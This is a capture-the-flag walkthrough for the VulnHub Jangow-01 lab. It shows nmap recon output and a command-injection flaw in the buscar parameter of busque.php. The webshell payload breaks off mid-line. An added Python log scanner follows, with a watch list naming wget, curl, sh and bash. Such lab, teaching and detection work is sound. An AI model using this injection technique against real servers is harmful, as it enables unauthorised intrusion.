vuluhub_jangow-01-1.0.1


Preface

Target machine: jangow-01-1.0.1
Attack machine: Kali Linux 2022.4
Target description

Attacking the target

Target discovery

Scan the network segment with nmap:
    ┌──(root㉿kali)-[/home/kali]
    └─# nmap 192.168.70.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
    Nmap scan report for 192.168.70.1
    Host is up (0.00012s latency).
    All 1000 scanned ports on 192.168.70.1 are in ignored states.
    Not shown: 1000 filtered tcp ports (no-response)
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.70.2
    Host is up (0.000056s latency).
    Not shown: 999 closed tcp ports (reset)
    PORT   STATE SERVICE
    53/tcp open  domain
    MAC Address: 00:50:56:FE:42:C8 (VMware)
    Nmap scan report for 192.168.70.152
    Host is up (0.00027s latency).
    Not shown: 998 filtered tcp ports (no-response)
    PORT   STATE SERVICE
    21/tcp open  ftp
    80/tcp open  http
    MAC Address: 00:0C:29:67:A6:61 (VMware)
    Nmap scan report for 192.168.70.254
    Host is up (0.00022s latency).
    All 1000 scanned ports on 192.168.70.254 are in ignored states.
    Not shown: 1000 filtered tcp ports (no-response)
    MAC Address: 00:50:56:EA:9C:6A (VMware)
    Nmap scan report for 192.168.70.137
    Host is up (0.0000070s latency).
    All 1000 scanned ports on 192.168.70.137 are in ignored states.
    Not shown: 1000 closed tcp ports (reset)
    Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds
The target's IP address is 192.168.70.152. Next, scan it for open ports and service information:

    ┌──(root㉿kali)-[/home/kali]
    └─# nmap -A -p- 192.168.70.152
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
    Nmap scan report for 192.168.70.152
    Host is up (0.00042s latency).
    Not shown: 65533 filtered tcp ports (no-response)
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    80/tcp open  http    Apache httpd 2.4.18
    |_http-title: Index of /
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    | http-ls: Volume /
    | SIZE  TIME              FILENAME
    | -     2021-06-10 18:05  site/
    |_
    MAC Address: 00:0C:29:67:A6:61 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
    Network Distance: 1 hop
    Service Info: Host: 127.0.0.1; OS: Unix
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.42 ms 192.168.70.152
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
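Inspecting the website

Visit port 80 first.

The server exposes a directory listing; browse it for useful information.
A website is found under the site directory.


Vulnerability discovery

Look around the site's functionality.

An endpoint that accepts a parameter turns up:
http://192.168.70.152/site/busque.php?buscar=
Test the buscar variable.
Pass the value 1.

Nothing is echoed back, so pass id.

The parameter turns out to be vulnerable to RCE.
Exploitation


Use the vulnerability to write a webshell.
payload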
192.168.70.152/site/busque.php?buscar=echo '


魏晓东
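
From the defender's side, the testing of the buscar parameter described in this post (a plain value, then a command name such as id) is visible in the web server's access log. The following is an added example, not part of the original post: Python that scans Apache combined-format log lines for command-like values in that parameter. The log lines, the command-name watch list and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not taken from the page).
SAMPLE_LOG = """\
192.168.70.137 - - [13/Feb/2023:21:10:01 -0500] "GET /site/busque.php?buscar=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.70.137 - - [13/Feb/2023:21:10:09 -0500] "GET /site/busque.php?buscar=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.168.70.137 - - [13/Feb/2023:21:12:40 -0500] "GET /site/busque.php?buscar=echo%20test%20%3E%20note.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.70.20 - - [13/Feb/2023:21:13:02 -0500] "GET /site/index.html HTTP/1.1" 200 10190 "-" "Mozilla/5.0"
192.168.70.20 - - [13/Feb/2023:21:13:05 -0500] "GET /site/busque.php?buscar=video HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Captures: client, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SHELL_META = re.compile(r"[;|&`$<>\n]")
# Assumed watch list; extend it for the binaries present on your hosts.
COMMAND_NAMES = {"id", "whoami", "uname", "cat", "ls", "echo", "wget", "curl", "sh", "bash"}


def suspicious_reasons(value):
    """Return why a decoded parameter value looks like a shell command."""
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacter")
    tokens = value.split()
    first = tokens[0].rsplit("/", 1)[-1] if tokens else ""  # /bin/id -> id
    if first in COMMAND_NAMES:
        reasons.append("command name: " + first)
    return reasons


def scan(log_text, path="/site/busque.php", param="buscar"):
    """Flag requests to `path` whose `param` value looks like a command."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes, so encoded values are checked in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reasons = suspicious_reasons(value)
            if reasons:
                findings.append((client, value, status, reasons))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A legitimate search for a word such as cat would also be flagged, so treat hits as leads to review together with the response size and the sequence of requests from the same client.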
